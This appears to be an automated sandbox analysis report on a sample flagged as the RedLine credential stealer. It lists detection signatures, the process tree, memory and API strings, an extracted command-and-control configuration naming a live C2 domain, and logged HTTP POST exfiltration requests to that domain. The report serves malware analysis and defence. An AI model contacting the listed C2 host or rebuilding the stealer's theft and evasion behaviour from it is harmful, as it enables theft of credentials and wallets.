Play interactive tour

Edit tour

Windows Analysis Report kS2dqbsDwD

Overview

General Information

Sample Name:	kS2dqbsDwD (renamed file extension from none to exe)
Analysis ID:	452457
MD5:	888ab99280a081717ec5c5749266d1bd
SHA1:	3a071aeadd42c1232ff2878d2adf7f1e4a629180
SHA256:	e726f2014db779e3605f60499f84676ceb45160c6d092bedfa115f7e09d693e8
Tags:	exetrojan
Infos:
Most interesting Screenshot:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

.NET source code contains very large strings

May check the online IP address of the machine

Performs DNS queries to domains with low reputation

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample or dropped binary is a compiled AutoHotkey binary

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Connects to a URL shortener service

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

Is looking for software installed on the system

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

kS2dqbsDwD.exe (PID: 5492 cmdline: 'C:\Users\user\Desktop\kS2dqbsDwD.exe' MD5: 888AB99280A081717EC5C5749266D1BD)

325.exe (PID: 4796 cmdline: C:\Users\user\AppData\Roaming\325.exe 325 MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)

325.exe (PID: 1784 cmdline: {path} MD5: 523AC177BFB4FB64A20B60FC0CE3E0E3)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}

Yara Overview

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.304492926.000000000295C000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000002.00000002.306874811.0000000003A20000.00000004.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.362046970.0000000000402000.00000040.00000001.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 325.exe PID: 4796	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 325.exe PID: 1784	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 325.exe PID: 1784	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 325.exe PID: 1784	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.325.exe.3b45a60.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.325.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
2.2.325.exe.3b45a60.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 14.2.325.exe.400000.0.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["yspasenana.xyz:80"], "Bot Id": "world"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\325.exe

ReversingLabs: Detection: 33%

Multi AV Scanner detection for submitted file

Show sources

Source: kS2dqbsDwD.exe	Virustotal: Detection: 20%			Perma Link
Source: kS2dqbsDwD.exe	ReversingLabs: Detection: 13%

Source: unknown	HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.3:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.25.234.53:443 -> 192.168.2.3:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.217.201.169:443 -> 192.168.2.3:49715 version: TLS 1.2

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140087A90 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0000000140087A90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140087B90 FindFirstFileW,FindClose,FindFirstFileW,FindClose,	0_2_0000000140087B90
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D080 FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D080
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140062320 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0000000140062320
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_00000001400C2390 FindFirstFileW,	0_2_00000001400C2390
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D405 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D405
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D40F SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D40F
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D419 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D419
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D423 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D423
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D44D SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D44D
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D478 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D478
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D4A0 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D4A0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D4BE SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D4BE
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D4DF SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D4DF
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D500 SetFileAttributesW,GetLastError,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D500
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D792 FindFirstFileW,GetLastError,	0_2_000000014004D792
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D7E0 FindFirstFileW,GetLastError,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_000000014004D7E0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004D990 SystemTimeToFileTime,LocalFileTimeToFileTime,GetLastError,GetSystemTimeAsFileTime,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,CreateFileW,GetLastError,SetFileTime,GetLastError,CloseHandle,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,PeekMessageW,GetTickCount,FindNextFileW,FindClose,	0_2_000000014004D990
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140061A30 GetFullPathNameW,GetFullPathNameW,GetFileAttributesW,GetFileAttributesW,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,MoveFileW,DeleteFileW,MoveFileW,CopyFileW,GetLastError,FindNextFileW,FindClose,	0_2_0000000140061A30
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004CAE0 SetLastError,DeleteFileW,GetLastError,FindFirstFileW,GetLastError,GetTickCount,PeekMessageW,GetTickCount,DeleteFileW,GetLastError,FindNextFileW,FindClose,	0_2_000000014004CAE0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_0000000140032DC0 FindFirstFileW,FindNextFileW,FindClose,GetTickCount,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,FindClose,	0_2_0000000140032DC0
Source: C:\Users\user\Desktop\kS2dqbsDwD.exe	Code function: 0_2_000000014004DFA0 CreateFileW,GetFileSizeEx,CloseHandle,FindFirstFileW,GetLastError,FindClose,	0_2_000000014004DFA0

Networking:

May check the online IP address of the machine

Show sources

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

DNS query: name: iplogger.org

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Users\user\AppData\Roaming\325.exe	DNS query: yspasenana.xyz
Source: C:\Users\user\AppData\Roaming\325.exe	DNS query: yspasenana.xyz
Source: C:\Users\user\AppData\Roaming\325.exe	DNS query: yspasenana.xyz

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

DNS query: name: is.gd

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: yspasenana.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: yspasenana.xyzContent-Length: 1125491Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: yspasenana.xyzContent-Length: 1125483Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View	IP Address: 104.25.234.53 104.25.234.53

Source: Joe Sandbox View

ASN Name: DE-FIRSTCOLOwwwfirst-colonetDE DE-FIRSTCOLOwwwfirst-colonetDE

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: C:\Users\user\Desktop\kS2dqbsDwD.exe

Code function: 0_2_0000000140060290 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,InternetOpenW,InternetOpenUrlW,FreeLibrary,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,GetTickCount,PeekMessageW,GetTickCount,InternetReadFileExA,InternetCloseHandle,FreeLibrary,DeleteFileW,FreeLibrary,

0_2_0000000140060290

Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp	String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"DivX Web Player","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"Facebook Video","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"Chrome PDF Viewer","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"Chrome PDF Plugin","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"Google Earth","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"Google Talk","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"IBMJava*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: iplogger.org

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: yspasenana.xyzContent-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: kS2dqbsDwD.exe, kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp	String found in binary or memory: http://ahkscript.org
Source: kS2dqbsDwD.exe, 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp	String found in binary or memory: http://ahkscript.orgCould
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertBaltimoreCA-2G2.crt0
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: kS2dqbsDwD.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: kS2dqbsDwD.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertBaltimoreCA-2G2.crl0:
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertBaltimoreCA-2G2.crl0K
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: kS2dqbsDwD.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: kS2dqbsDwD.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://forms.rea
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: 325.exe, 0000000E.00000002.364077661.0000000002E87000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://go.micros
Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmp	String found in binary or memory: http://ns.ado/1
Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.c/g
Source: 325.exe, 0000000E.00000003.361749064.0000000008E80000.00000004.00000001.sdmp, 325.exe, 0000000E.00000003.356337504.0000000008E71000.00000004.00000001.sdmp	String found in binary or memory: http://ns.adobe.cobj
Source: kS2dqbsDwD.exe, 00000000.00000003.305719851.0000000000967000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362916266.0000000000EDE000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.362868644.0000000000EAF000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0R
Source: kS2dqbsDwD.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 325.exe, 0000000E.00000002.363528899.0000000002BB6000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/D
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://service.r
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://support.a
Source: 325.exe, 0000000E.00000002.364215556.0000000002F4D000.00000004.00000001.sdmp	String found in binary or memory: http://support.apple.com/kb/HT203092
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363663060.0000000002C48000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/0
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363513965.0000000002BAC000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: 325.exe, 0000000E.00000002.363745282.0000000002CC3000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363765245.0000000002CC8000.00000004.00000001.sdmp, 325.exe, 0000000E.00000002.363553809.0000000002BDB000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: 325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: 325.exe, 0000000E.00000002.363824201.0000000002CDE000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 325.exe, 0000000E.00000002.363469516.0000000002B61000.00000004.00000001.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: kS2dqbsDwD.exe, 00000000.00000002.307696663.0000000002C1A000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: kS2dqbsDwD.exe, 00000000.00000002.307334958.0000000000993000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 325.exe, 00000002.00000002.312271745.00000000069D2000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
